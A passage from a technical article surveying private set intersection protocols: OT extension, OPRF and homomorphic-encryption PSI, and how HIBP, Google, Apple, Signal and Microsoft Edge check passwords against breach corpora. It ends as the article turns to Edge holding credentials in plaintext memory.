&lt;p&gt;Here is the central fact that drove a decade of cryptographic engineering: &lt;strong&gt;every PSI protocol that scales eventually reduces to &quot;many oblivious transfers.&quot;&lt;/strong&gt; OT is the universal building block. Once you can do millions of OTs per second, you can do nearly any two-party secure computation, including PSI. The question is how cheap &quot;many OTs&quot; can become.&lt;/p&gt;

A two-party primitive. In 1-out-of-2 OT, the sender holds two messages $(m_0, m_1)$, the receiver chooses a bit $b$, and after the protocol runs the receiver learns $m_b$ while the sender learns nothing about $b$. OT is universal -- it suffices for secure two-party computation of any function -- and it is also expensive: implemented directly from public-key primitives, each OT costs at least one Diffie-Hellman exponentiation, on the order of a millisecond per OT on commodity hardware.

A two-phase protocol that performs $m$ OTs at the cost of $\kappa$ &quot;base&quot; OTs (typically $\kappa = 128$, implemented with public-key crypto) plus $O(m)$ symmetric primitive calls. Because $\kappa$ is small and constant, the per-OT cost drops from public-key cost (~1 ms) to symmetric-crypto cost (~100 ns) -- roughly three orders of magnitude, and the asymptotic gap widens with $m$.
&lt;h3&gt;Generation 1: IKNP03&lt;/h3&gt;
&lt;p&gt;In 2003, Yuval Ishai, Joe Kilian, Kobbi Nissim, and Erez Petrank published &quot;Extending Oblivious Transfers Efficiently&quot; at CRYPTO 2003 [@iknp-2003].&lt;/p&gt;
&lt;p&gt;Ishai and Petrank are at Technion; Kilian and Nissim were at NEC Labs America at the time. The construction is short enough to summarize in one paragraph and important enough to be called &lt;em&gt;the&lt;/em&gt; OT extension: start with $\kappa$ &quot;base&quot; OTs done the expensive way (one public-key operation each), then use them to seed pseudorandom generators and a clever transposition trick that, with $O(m)$ hash-function calls, produces $m$ effective OTs. The base cost stays fixed at $\kappa$ public-key operations; the per-OT marginal cost collapses to a few hash invocations.&lt;/p&gt;
&lt;p&gt;The numerical impact: before IKNP, secure-computation researchers cited oblivious-transfer cost in milliseconds; after IKNP, in hundreds of nanoseconds. Three orders of magnitude is the difference between &quot;research artifact&quot; and &quot;this protocol can ship.&quot;No IACR ePrint preprint existed at publication time; a post-conference upload appeared in 2008 as ePrint 2008/508. ePrint 2003/052 is a different paper (Klima, Pokorny, Rosa). The Springer LNCS chapter [@iknp-2003] is the canonical reference.&lt;/p&gt;
&lt;h3&gt;Generation 2: KOS15&lt;/h3&gt;
&lt;p&gt;IKNP03 is secure against a &lt;em&gt;semi-honest&lt;/em&gt; adversary -- one who follows the protocol but tries to learn extra information from the transcript. Real-world deployments often need &lt;em&gt;active&lt;/em&gt; security: protection against an adversary who deviates to extract information or bias the output.&lt;/p&gt;
&lt;p&gt;In 2015, Marcel Keller, Emmanuela Orsini, and Peter Scholl published &quot;Actively Secure OT Extension with Optimal Overhead&quot; [@kos-2015]. The construction adds a correlation-check phase on top of IKNP03 that catches active deviations with overwhelming probability. The paper&apos;s own abstract: &quot;no more than 5% more time than the passively secure IKNP extension, in both LAN and WAN environments, and thus is essentially optimal with respect to the passive protocol.&quot; Modern implementations (libOTe, EMP-toolkit, MP-SPDZ) report on the order of 10-20% wall-clock overhead and 5-10% communication overhead over semi-honest IKNP03 in production -- the &quot;optimal overhead&quot; in the title is the claim that this margin vanishes as the OT count grows.&lt;/p&gt;
&lt;p&gt;After KOS15, &quot;active security is free&quot; became the industry default. Every modern OT-extension library -- libOTe, EMP-toolkit, MP-SPDZ -- ships KOS15 (or a close variant) as the production-grade default. The earlier semi-honest-only choice is a research artifact.&lt;/p&gt;
&lt;h3&gt;Generation 3: Silent OT&lt;/h3&gt;
&lt;p&gt;In 2019, a six-author collaboration -- Elette Boyle, Geoffroy Couteau, Niv Gilboa, Yuval Ishai, Lisa Kohl, and Peter Scholl -- published &quot;Efficient Pseudorandom Correlation Generators: Silent OT Extension and More&quot; at CRYPTO 2019 [@silent-ot-2019]. The construction replaces the communication-heavy IKNP/KOS phase with a &lt;em&gt;Pseudorandom Correlation Generator&lt;/em&gt; (PCG): the two parties exchange a few-kilobyte seed and locally expand it into millions of correlated OTs.&lt;/p&gt;

A protocol primitive that, given a short shared seed, lets two parties locally expand the seed into long correlated random strings -- in the OT case, the random correlations needed to &quot;consume&quot; each OT call. Once the seed is exchanged, no further communication is needed to produce more OTs; the parties simply expand more locally. PCGs reduce the per-OT wire cost to zero in the post-seed phase.
&lt;p&gt;The numerical impact this time is &lt;em&gt;bandwidth&lt;/em&gt;. Pre-Silent-OT, OT-extension protocols sent on the order of $\kappa$ bits per OT. Silent OT sends a polylogarithmic amount of data total for the entire extension. The precursor construction &quot;Compressing Vector OLE&quot; by Boyle, Couteau, Gilboa, Ishai, Kohl, and Rindal [@boyle-vector-ole-2019] laid the algebraic foundation.&lt;/p&gt;
&lt;p&gt;For Edge Password Monitor&apos;s deployment shape (small client set, large server set), Silent OT does not land in the production protocol -- HE-PSI provides the asymmetric communication scaling -- but its existence in 2019 is part of why the industry treats OT extension as essentially solved engineering and feels free to ride a higher-layer protocol on top.&lt;/p&gt;
&lt;h3&gt;The OPRF-PSI plateau: KKRT16&lt;/h3&gt;
&lt;p&gt;Pure OT-extension is one substrate; the other is the Oblivious Pseudorandom Function.&lt;/p&gt;

A two-party protocol in which the sender holds a key $k$, the receiver holds an input $x$, and after the protocol the receiver learns $F_k(x)$ while the sender learns nothing about $x$. The receiver gets the PRF output without giving up the input; the sender keeps the key without giving up the output. OPRFs are the building block under most modern PSI: each party evaluates the OPRF on their set, then plaintext-compares the outputs.
&lt;p&gt;In 2016, Vladimir Kolesnikov, Ranjit Kumaresan, Mike Rosulek, and Ni Trieu published &quot;Efficient Batched Oblivious PRF with Applications to Private Set Intersection&quot; at CCS 2016 [@kkrt-2016]. The paper builds a batched OPRF directly on top of KOS-style OT extension. The reported benchmark: intersecting two $2^{20}$-element sets on a LAN took about 3.8 seconds total. For several years, KKRT16 was the deployment-grade symmetric-PSI protocol.&lt;/p&gt;
&lt;p&gt;KKRT16 is great if your two sets are roughly the same size. The Edge Password Monitor problem is fundamentally asymmetric -- the client holds a few hundred saved passwords, the server holds billions of breached credentials. For &lt;em&gt;asymmetric&lt;/em&gt; PSI, the OT-extension lineage hits a wall the next generation has to climb.&lt;/p&gt;

flowchart LR
    A[&quot;Kappa base OTs&lt;br /&gt;(public-key)&quot;] --&amp;gt; B[&quot;IKNP03 extension&lt;br /&gt;(symmetric)&quot;]
    B --&amp;gt; C[&quot;KOS15 active security&quot;]
    C --&amp;gt; D[&quot;Silent OT&lt;br /&gt;(PCG-based)&quot;]
    B --&amp;gt; E[&quot;KKRT16 OPRF-PSI&quot;]
    C --&amp;gt; F[&quot;CHLR18 HE-PSI&lt;br /&gt;+ OPRF wrapping&quot;]
    D --&amp;gt; G[&quot;Modern OT-extension libraries:&lt;br /&gt;libOTe, EMP-toolkit&quot;]
    E --&amp;gt; H[&quot;Symmetric balanced PSI&quot;]
    F --&amp;gt; I[&quot;Edge Password Monitor&quot;]
&lt;h2&gt;5. The breakthrough: HE-based PSI&lt;/h2&gt;
&lt;p&gt;Asymmetric PSI requires that the server&apos;s heavy compute stays on the server, and that the client send only a tiny encrypted query whose size is independent of $|S_B|$. That is exactly what fully homomorphic encryption -- or, more precisely, &lt;em&gt;somewhat-homomorphic&lt;/em&gt; encryption -- can offer.&lt;/p&gt;

An encryption scheme is *homomorphic* if operations on ciphertexts decrypt to the corresponding operations on plaintexts. *Somewhat-homomorphic encryption* (SWHE) supports a bounded depth of operations (typically additions and multiplications) before noise growth requires re-encryption. *Fully homomorphic encryption* (FHE) supports arbitrary-depth circuits via bootstrapping. The BFV scheme (Brakerski-Fan-Vercauteren), implemented in Microsoft SEAL [@ms-seal], is the SWHE variant Edge Password Monitor uses; FHE is the popular term but the actual deployed circuit depth fits comfortably within SWHE.
&lt;h3&gt;CLR17: the cost curve flips&lt;/h3&gt;
&lt;p&gt;In 2017, Hao Chen, Kim Laine, and Peter Rindal published &quot;Fast Private Set Intersection from Homomorphic Encryption&quot; at CCS 2017 [@clr-2017]. The construction is a clean revival of FNP04&apos;s polynomial-roots idea, with three engineering moves that fix every reason FNP04 was infeasible.&lt;strong&gt;Move 1: SWHE instead of Paillier.&lt;/strong&gt; BFV ciphertexts pack many plaintext slots and support SIMD-style homomorphic operations. A single ciphertext can encrypt and evaluate over thousands of plaintext values in parallel; the slot count is set at scheme-parameter time.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Move 2: Cuckoo hash partitioning.&lt;/strong&gt; The receiver Cuckoo-hashes its set $S_R$ into bins. The sender hashes each element of $S_S$ to the same set of bins. Instead of one giant polynomial whose roots are all of $S_S$, the sender builds one small polynomial per bin -- typically a few thousand bins, each holding a few hundred elements.&lt;/p&gt;

A hashing scheme that uses $k$ hash functions and inserts each element into one of $k$ candidate bins, displacing existing occupants if necessary (the displaced element finds another of its candidate bins). Cuckoo hashing achieves $O(1)$ worst-case lookup; the achievable load factor depends on the number of hash functions and the bucket size -- roughly 49% with $k=2$ (the original Pagh-Rodler 2001 construction [@pagh-rodler-2001]), roughly 91% with $k=3$, and higher with a stash of evicted elements or $k \geq 4$. CLR17 and CHLR18 use parameter choices in the high-load regime. In CLR17, Cuckoo hashing pairs the receiver&apos;s set with the sender&apos;s set so that two equal elements end up in the same bin with overwhelming probability.
&lt;p&gt;&lt;strong&gt;Move 3: Partition-and-evaluate.&lt;/strong&gt; The receiver encrypts its bins under BFV and sends them. The sender homomorphically evaluates its per-bin polynomial at the encrypted receiver&apos;s bin. Because of SIMD slot packing, each bin&apos;s polynomial is evaluated in parallel across all slots, and the sender&apos;s total work is $O(|S_S| \log |S_R|)$ FHE operations instead of FNP04&apos;s $O(|S_R| \cdot |S_S|)$.&lt;/p&gt;
&lt;p&gt;The headline benchmark from the paper, on the MSR publication page: &quot;36 seconds of online-computation and 12.5 MB of round trip communication to intersect five thousand 32-bit strings with 16 million 32-bit strings&quot; [@msr-clr17-pub]. Communication scales linearly in the small set and logarithmically in the large set. The cost curve is finally right.&lt;/p&gt;

sequenceDiagram
    participant C as Client (Edge)
    participant S as Server (Microsoft)
    Note over C,S: stage 1 -- OPRF preprocessing (binds queries to server&apos;s secret key)
    C-&amp;gt;&amp;gt;S: blinded credential beta * H(cred)
    S-&amp;gt;&amp;gt;C: alpha * (blinded H(cred)) using server key alpha
    C-&amp;gt;&amp;gt;C: unblind, obtain F_alpha(cred)
    Note over C,S: stage 2 -- HE-PSI on sharded corpus
    C-&amp;gt;&amp;gt;S: BFV ciphertext encrypting F_alpha(cred), sharded by 2-byte prefix
    S-&amp;gt;&amp;gt;S: Cuckoo-hash shard, evaluate per-bin polynomial homomorphically
    S-&amp;gt;&amp;gt;C: encrypted match result + label ciphertext
    C-&amp;gt;&amp;gt;C: decrypt result, then if match surface breach metadata
&lt;h3&gt;CHLR18: labeled, malicious, deployable&lt;/h3&gt;
&lt;p&gt;The next year, the same authors plus Zhicong Huang published &quot;Labeled PSI from Fully Homomorphic Encryption with Malicious Security&quot; at CCS 2018 [@chlr-2018]. The paper adds three production-grade properties.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Labels.&lt;/strong&gt; Each element in the server&apos;s set can carry an associated label (which breach, when, severity). When the receiver finds a match, they also recover the label.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Malicious security.&lt;/strong&gt; The protocol is secure against an actively malicious sender, layered on top of the underlying semi-honest construction via an OPRF preprocessing step. The OPRF is the same primitive we met in §4; here it does double duty: it prevents the client from brute-forcing the server&apos;s corpus offline (the client cannot evaluate $F_k(\cdot)$ without server interaction) and provides the malicious-security guarantee.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Arbitrary-length items.&lt;/strong&gt; The protocol handles long inputs (full URLs plus usernames, in the breach-checking case), not just short fixed-width keys.&lt;/p&gt;
&lt;p&gt;The headline benchmark: &quot;for an intersection of $2^{20}$ and 512 size sets of arbitrary length items our protocol has a total online running time of just 1 second (single thread), and a total communication cost of 4 MB&quot; [@msr-chlr18-pub]. A larger benchmark of $2^{28}$ and 1024 takes 12 seconds multithreaded with less than 18 MB of communication.&lt;/p&gt;
&lt;h3&gt;Cong et al. 2021: the production-grade successor&lt;/h3&gt;
&lt;p&gt;The protocol that ships in Edge Password Monitor today is the descendant published by Kelong Cong, Radames Cruz Moreno, Mariana Botelho da Gama, Wei Dai, Ilia Iliashenko, Kim Laine, and Michael Rosenberg at CCS 2021: &quot;Labeled PSI from Homomorphic Encryption with Reduced Computation and Communication&quot; [@cong-2021]. The paper is the basis for Microsoft&apos;s open-source APSI library [@ms-apsi], whose README states verbatim that it &quot;provides a PSI functionality for asymmetric set sizes based on the protocol described in eprint.iacr.org/2021/1116&quot; and that it &quot;uses the BFV encryption scheme implemented in the Microsoft SEAL library.&quot;The Cong et al. 2021 byline is seven authors: Kelong Cong, Radames Cruz Moreno, Mariana Botelho da Gama, Wei Dai, Ilia Iliashenko, Kim Laine, Michael Rosenberg. Some upstream reporting conflates a different author list onto the same URL; the citation_author meta-tags returned by ePrint 2021/1116 confirm this seven-author septuple [@cong-2021].&lt;/p&gt;
&lt;h3&gt;The OPRF wrapping and corpus sharding&lt;/h3&gt;
&lt;p&gt;Two practical layers on top of the bare HE-PSI protocol turn the academic construction into a production deployment, and the Microsoft Research Password Monitor blog is explicit about both [@msr-password-monitor-2021].&lt;/p&gt;
&lt;p&gt;First, the OPRF preprocessing. Without it, a malicious client could send candidate passwords one at a time and observe match results, brute-forcing the server&apos;s corpus. With it, every client query passes through $F_k(\cdot)$ where $k$ is a server secret. The MSR blog states: &quot;the client communicates with the server to obtain a hash $H$ of the credential, where $H$ denotes a hash function that only the server knows... using an OPRF... the client is prevented from performing an efficient dictionary attack on the server&quot; [@msr-password-monitor-2021].&lt;/p&gt;
&lt;p&gt;Second, corpus sharding. The MSR blog notes that the corpus is sharded by the first two bytes of a username-hash. The blog&apos;s verbatim example: &quot;Suppose the database $D$ consists of 4 billion credentials, then after sharding each subset, it will contain about 60,000 credentials on average.&quot; At the article&apos;s 2026 5-billion projection the math is the same -- corpus divided by $2^{16}$ -- and per-shard work is closer to 76,000 credentials. Either way, the per-query homomorphic evaluation runs against tens of thousands of credentials instead of the full corpus. This is the same engineering trade as Apple&apos;s 15-bit bucketing -- a small information leak (the client reveals which shard their query lives in) in exchange for tractable per-query compute.&lt;/p&gt;

A Windows facility, introduced in Windows 2000, that encrypts arbitrary blobs under a user-derived key chain (ultimately rooted in the user&apos;s password, with hardware-bound variants under DPAPI-NG) and exposes a simple `CryptProtectData` / `CryptUnprotectData` API [@ms-learn-dpapi-ng]. Browsers including Chromium store the symmetric key that wraps their saved-password database under DPAPI at rest. This protects the on-disk database when the user is not logged in, but it does not protect process memory after the same user has unwrapped the data into a running browser.

This unique security feature is possible due to pioneering cryptography research and technology incubation done here at Microsoft Research. -- Microsoft Research, January 21, 2021 [@msr-password-monitor-2021]
&lt;p&gt;The administrator-visible group policy that controls this feature is &lt;code&gt;PasswordMonitorAllowed&lt;/code&gt;, documented on Microsoft Learn [@ms-learn-edge-pm].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Asymmetric PSI on somewhat-homomorphic encryption flips the cost curve so that communication scales with the small client set, not the enormous server set. That is why a homomorphic-encryption protocol can ship on a consumer browser in 2021 without melting the user&apos;s CPU. The cryptographic case for Edge Password Monitor is auditable down to the published papers and unequivocally well-engineered.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft has shipped the first production consumer homomorphic-encryption deployment in a browser, against the threat &quot;server-side breach corpus leakage,&quot; on the same browser that, in §7, will turn out to hold every saved credential in plaintext RAM the entire time you have it open. To make sense of that contrast, we need to see what the rest of the industry did with the same problem.&lt;/p&gt;
&lt;h2&gt;6. State of the art: four deployed compromised-credential services&lt;/h2&gt;
&lt;p&gt;PSI on paper is one thing. PSI in production is another. The &quot;pure PSI&quot; ideal -- both parties learn the intersection and &lt;em&gt;nothing else&lt;/em&gt;, no information leaks on either side -- is impractical at planetary scale. Every deployed compromised-credential service in 2026 makes a concession somewhere.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The concessions reveal which threats each provider takes most seriously. Read the next table by column 3 (&quot;what is revealed on the wire&quot;) and column 6 (&quot;dictionary-attack hardening&quot;) side by side: that pair tells you the threat model each provider chose.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The four services compared here are HIBP Pwned Passwords v3, Google Password Checkup, Apple Password Monitoring (iCloud Keychain), and Microsoft Edge Password Monitor. A fifth, Signal contact discovery, is technically a contact-discovery service rather than a breach checker, but it sits on the same protocol map and is the canonical &quot;we used a TEE instead of pure crypto&quot; data point.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;th&gt;Protocol family&lt;/th&gt;
&lt;th&gt;What&apos;s revealed on the wire&lt;/th&gt;
&lt;th&gt;Server trust&lt;/th&gt;
&lt;th&gt;Bandwidth at scale&lt;/th&gt;
&lt;th&gt;Dictionary-attack hardening&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;HIBP Pwned Passwords v3 [@hibp-api-v3]&lt;/td&gt;
&lt;td&gt;Pure SHA-1 5-hex-char k-anonymity&lt;/td&gt;
&lt;td&gt;A 20-bit hash prefix per query&lt;/td&gt;
&lt;td&gt;None (zero-trust API)&lt;/td&gt;
&lt;td&gt;Trivial (a few KB per query)&lt;/td&gt;
&lt;td&gt;None on the wire; SHA-1 hash makes corpus searchable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google Password Checkup [@thomas-usenix-2019]&lt;/td&gt;
&lt;td&gt;k-anonymity + blinded-hash OPRF&lt;/td&gt;
&lt;td&gt;A small hash prefix per query&lt;/td&gt;
&lt;td&gt;Honest-but-curious&lt;/td&gt;
&lt;td&gt;Tens of KB per query&lt;/td&gt;
&lt;td&gt;OPRF prevents corpus enumeration by the client&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Apple Password Monitoring [@apple-password-monitoring]&lt;/td&gt;
&lt;td&gt;EC-based PSM on NIST P-256 + 15-bit bucket&lt;/td&gt;
&lt;td&gt;A 15-bit prefix + double-blinded EC point&lt;/td&gt;
&lt;td&gt;Honest-but-curious&lt;/td&gt;
&lt;td&gt;A few hundred KB per query (padded)&lt;/td&gt;
&lt;td&gt;OPRF + double-blinding + padding-to-fixed-count&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Signal contact discovery (2017) [@signal-private-contact-2017]&lt;/td&gt;
&lt;td&gt;SGX enclave + ORAM (no pure crypto)&lt;/td&gt;
&lt;td&gt;Nothing visible to Signal staff&lt;/td&gt;
&lt;td&gt;TEE attestation&lt;/td&gt;
&lt;td&gt;Negligible (single SGX RPC)&lt;/td&gt;
&lt;td&gt;Enclave isolation rather than crypto hardening&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Edge Password Monitor [@msr-password-monitor-2021]&lt;/td&gt;
&lt;td&gt;HE-PSI on Microsoft SEAL + OPRF + 2-byte shard&lt;/td&gt;
&lt;td&gt;2-byte username-hash prefix + BFV ciphertext&lt;/td&gt;
&lt;td&gt;Honest-but-curious&lt;/td&gt;
&lt;td&gt;Single MB-range round trip&lt;/td&gt;
&lt;td&gt;OPRF binds queries to server key; HE prevents transcript leaks&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;HIBP Pwned Passwords v3: the k-anonymity baseline&lt;/h3&gt;
&lt;p&gt;Troy Hunt launched Pwned Passwords v2 in 2018 with the help of Junade Ali at Cloudflare, adding a k-anonymity API; the design is published in two posts, Hunt&apos;s &quot;I&apos;ve Just Launched Pwned Passwords Version 2&quot; and Ali&apos;s &quot;Validating Leaked Passwords with k-Anonymity&quot; [@hunt-pwned-v2-2018][@ali-cloudflare-2018]. The protocol is delightfully simple: the client hashes the candidate password under SHA-1, sends the first 5 hex characters (20 bits) of the hash to the API, and the API returns every suffix in that bucket. The client compares locally.&lt;/p&gt;

A privacy property: each query produces output that is consistent with at least $k$ other potential queries the client could have made. In the HIBP context, $k$ is the number of distinct password hashes that share the same 20-bit SHA-1 prefix -- typically a few hundred. The server learns the bucket but not which specific password the client cares about, and (because hashes are sparse over the prefix space) cannot easily distinguish &quot;the user has password X&quot; from &quot;the user has password Y&quot; if X and Y share the prefix.
&lt;p&gt;The HIBP corpus serves &quot;18B+ Monthly Requests&quot; against roughly a billion hashes [@hibp-passwords]. Operationally, this is a one-shot HTTP GET. There is no PSI on the wire beyond TLS. The whole protocol fits on the back of an envelope. The cost: each query leaks the 20-bit prefix, which is enough to identify the user&apos;s password if the attacker has independent information narrowing the candidate space.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;async function sha1Hex(s) {   const buf = new TextEncoder().encode(s);   const hash = await crypto.subtle.digest(&quot;SHA-1&quot;, buf);   return [...new Uint8Array(hash)].map(b =&amp;gt; b.toString(16).padStart(2, &quot;0&quot;)).join(&quot;&quot;).toUpperCase(); } async function showBucket(password) {   const h = await sha1Hex(password);   const prefix = h.slice(0, 5);    // 5 hex chars -- 20 bits sent to server   const suffix = h.slice(5);   console.log(&quot;Password:&quot;, password);   console.log(&quot;SHA-1:   &quot;, h);   console.log(&quot;Prefix (leaves your device):&quot;, prefix);   console.log(&quot;Suffix (compared locally):  &quot;, suffix);   console.log(&quot;Approx bucket size: ~&quot;, Math.round(847_223_402 / (1&amp;lt;&amp;lt;20)), &quot;entries&quot;); } showBucket(&quot;hunter2&quot;);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;The mental model the runnable above gives is the precise shape of the trade. Every HIBP query says &quot;I am asking about a password whose SHA-1 starts with these 20 bits.&quot; There are roughly $2^{20} \approx 1{,}048{,}576$ possible prefixes, so each query narrows the server&apos;s posterior over your password by exactly that much.&lt;/p&gt;
&lt;h3&gt;Google Password Checkup: k-anonymity with an OPRF on top&lt;/h3&gt;
&lt;p&gt;In August 2019, Kurt Thomas and colleagues at Google published &quot;Protecting Accounts from Credential Stuffing with Password Breach Alerting&quot; at USENIX Security [@thomas-usenix-2019]. The accompanying blog post on the Google Security Blog announces the deployment [@google-blog-password-checkup-2019]. The numbers are familiar at this point: &quot;a cloud service that mediates access to over 4 billion credentials found in breaches and a Chrome extension serving as an initial client. Based on anonymous telemetry from nearly 670,000 users and 21 million logins, we find that 1.5% of logins on the web involve breached credentials&quot; [@thomas-usenix-2019].&lt;/p&gt;
&lt;p&gt;The protocol upgrades HIBP&apos;s k-anonymity baseline with an OPRF preprocessing round: instead of hashing under SHA-1 locally and sending the prefix, the client first obtains $F_k(\text{password})$ via an OPRF interaction, where $k$ is a Google-held key. The OPRF output is then bucketed and matched against Google&apos;s corpus. The OPRF prevents the client from enumerating Google&apos;s corpus offline; the bucketing limits per-query server work.&lt;/p&gt;
&lt;h3&gt;Apple Password Monitoring: PSM with double-blinding&lt;/h3&gt;
&lt;p&gt;Apple&apos;s protocol is the most cryptographically elaborate of the four. The Apple Platform Security guide is unusually explicit [@apple-password-monitoring][@apple-security-guide-pdf]. From the guide, verbatim: &quot;a form of cryptographic private set intersection is deployed that compares the users&apos; passwords against a large set of leaked passwords&quot;; the corpus is &quot;approximately 1.5 billion passwords... into $2^{15}$ different buckets&quot;; and the protocol uses elliptic-curve PSM on NIST P-256 with a double-blinded structure.&lt;/p&gt;
&lt;p&gt;The math, slightly compressed. Let $H_{\text{SWU}}$ be the Shallue-van de Woestijne-Ulas hash-to-curve.&lt;/p&gt;
&lt;p&gt;Google publishes an open-source PSM construction at &lt;code&gt;google/private-membership&lt;/code&gt; [@google-private-membership-github]; Apple&apos;s protocol shares the EC double-blinding skeleton. Apple computes a per-corpus-element representation:&lt;/p&gt;
&lt;p&gt;$$P_{pw} = \alpha \cdot H_{\text{SWU}}(pw)$$&lt;/p&gt;
&lt;p&gt;where $\alpha$ is a secret random key known only to Apple. The client computes its query:&lt;/p&gt;
&lt;p&gt;$$P_c = \beta \cdot H_{\text{SWU}}(pw)$$&lt;/p&gt;
&lt;p&gt;with $\beta$ chosen randomly per-query. The interaction lets the client recover $\alpha \cdot H_{\text{SWU}}(pw)$ and check it against a 15-bit bucket of $P_{pw}$ values. (Apple&apos;s public documentation hashes only the password; whether the production implementation includes additional salting is not disclosed.) The double-blinding is the point: $\alpha$ stays Apple&apos;s secret (so the client cannot enumerate); $\beta$ stays per-query random (so Apple cannot link two queries from the same client).Apple&apos;s PSM defends &lt;em&gt;also&lt;/em&gt; against the server learning how many unique passwords a user has, by padding-to-fixed-count with random queries: &quot;if a user has fewer than this number, random passwords are generated and added to the queries to make up the difference&quot; [@apple-password-monitoring]. None of the other four services deploys this defence. The padding cost is the price.&lt;/p&gt;
&lt;h3&gt;Signal contact discovery: the TEE outlier&lt;/h3&gt;
&lt;p&gt;In September 2017, Moxie Marlinspike published &quot;Technology Preview: Private Contact Discovery&quot; on Signal&apos;s blog [@signal-private-contact-2017]. The post is candid about the cost calculation that drove Signal toward Intel SGX rather than pure cryptographic PSI:&lt;/p&gt;

Signal clients will be able to efficiently and scalably determine whether the contacts in their address book are Signal users *without revealing the contacts in their address book to the Signal service*. -- Moxie Marlinspike, September 2017 [@signal-private-contact-2017]
&lt;p&gt;Marlinspike is explicit about the cost calculation: &quot;Doing better is difficult. There are a range of options that don&apos;t work... like using bloom filters, encrypted bloom filters, sharded bloom filters.&quot; Signal examines pure cryptographic PSI and decides, given its scale and latency requirements, that an SGX enclave running a constant-time ORAM-protected lookup is the better engineering trade [@signal-cds-github].&lt;/p&gt;

The SGX choice came with side-channel debt that subsequent literature made expensive. Foreshadow (2018) [@foreshadow-2018], SgxPectre (2018) [@sgxpectre-2018], SGAxe (2020) [@sgaxe-2020], and AEPIC Leak (2022) [@aepic-leak-2022] all targeted SGX directly. Each disclosure prompted Signal to publish a re-evaluation. Signal eventually migrated to the second-generation Contact Discovery Service (CDSI), which continues to rely on TEEs but with a hardened threat model. The point for our story is not that SGX is bad. It is that &quot;pure crypto vs. TEE&quot; is not a settled question; every provider revisits it under their own latency, corpus, and threat-model constraints, and each makes a different decision.
&lt;h3&gt;Microsoft Edge Password Monitor&lt;/h3&gt;
&lt;p&gt;The Microsoft deployment is the only one shipping a full HE-PSI protocol on the wire against the full corpus. As established in §5, the protocol stack is:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Two-byte username-hash shard selection (corpus partitioned, sender does work only against tens of thousands of elements per query -- the MSR blog&apos;s 2021 example uses 4 billion / $2^{16} \approx$ 60,000; the article&apos;s 2026 5-billion projection yields $\approx$ 76,000).&lt;/li&gt;
&lt;li&gt;OPRF preprocessing (binds queries to a server secret; prevents client-side enumeration).&lt;/li&gt;
&lt;li&gt;BFV-encrypted query, evaluated against the Cuckoo-hashed per-bin polynomials, returned as a single ciphertext per shard.&lt;/li&gt;
&lt;li&gt;Client decrypts; if matched, decrypts the associated label (the breach metadata).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;All four moving parts are described in the MSR blog, the Cong et al. 2021 paper, and the open-source APSI library [@msr-password-monitor-2021][@cong-2021][@ms-apsi]. Communication scales with the small client set; sender compute scales with the (sharded) server set. The Microsoft Edge enterprise documentation says the feature &quot;helps Microsoft Edge users protect their online accounts by informing them if any of their passwords are found in an online leak&quot; [@ms-learn-edge-pm].&lt;/p&gt;
&lt;h3&gt;Four products, four concessions&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;th&gt;Primary concession&lt;/th&gt;
&lt;th&gt;What it defends against&lt;/th&gt;
&lt;th&gt;What it does not&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;HIBP&lt;/td&gt;
&lt;td&gt;20-bit prefix leak per query&lt;/td&gt;
&lt;td&gt;Server learning the password&lt;/td&gt;
&lt;td&gt;A linkage attack on repeated queries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google PCU&lt;/td&gt;
&lt;td&gt;OPRF transcript + prefix&lt;/td&gt;
&lt;td&gt;Client-side corpus enumeration&lt;/td&gt;
&lt;td&gt;Server-side query inference if the prefix is rare&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Apple PSM&lt;/td&gt;
&lt;td&gt;15-bit bucket + double-blinding overhead&lt;/td&gt;
&lt;td&gt;Both client and server enumeration; query linkage&lt;/td&gt;
&lt;td&gt;Side-channels on the EC implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Signal CDS&lt;/td&gt;
&lt;td&gt;TEE attestation trust&lt;/td&gt;
&lt;td&gt;Server-side mass-data exfiltration&lt;/td&gt;
&lt;td&gt;SGX side-channel attacks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Edge PM&lt;/td&gt;
&lt;td&gt;2-byte shard leak + OPRF transcript&lt;/td&gt;
&lt;td&gt;Anything short of breach corpus leakage from inside Microsoft&lt;/td&gt;
&lt;td&gt;Endpoint compromise -- see §7&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Four products. Four different concessions. Each is internally coherent. None of them solves a problem that Tom Joran Sonstebyseter Ronning&apos;s PoC will turn out to make trivial.&lt;/p&gt;
&lt;h2&gt;7. The other half: plaintext RAM &quot;by design&quot;&lt;/h2&gt;
&lt;p&gt;Now we turn the article inside out.&lt;/p&gt;
